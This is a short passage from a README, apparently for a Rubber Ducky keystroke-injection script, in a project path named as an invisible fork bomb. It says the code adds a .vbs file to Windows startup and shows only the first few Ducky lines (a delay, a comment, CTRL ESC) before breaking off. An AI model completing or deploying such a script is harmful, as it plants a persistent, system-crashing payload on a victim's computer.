125K/INVISIBLE_Fork_Bomb_HID/README.md

 # Code for Ducky (V. 3.0) (It adds the file to the startup)

-This code adds the .vbs file to the startup:

 <pre><code>DELAY 1000
 REM ^ You should set more delay time if your computer is slow or if the script doesn't work correctly.
 CTRL ESC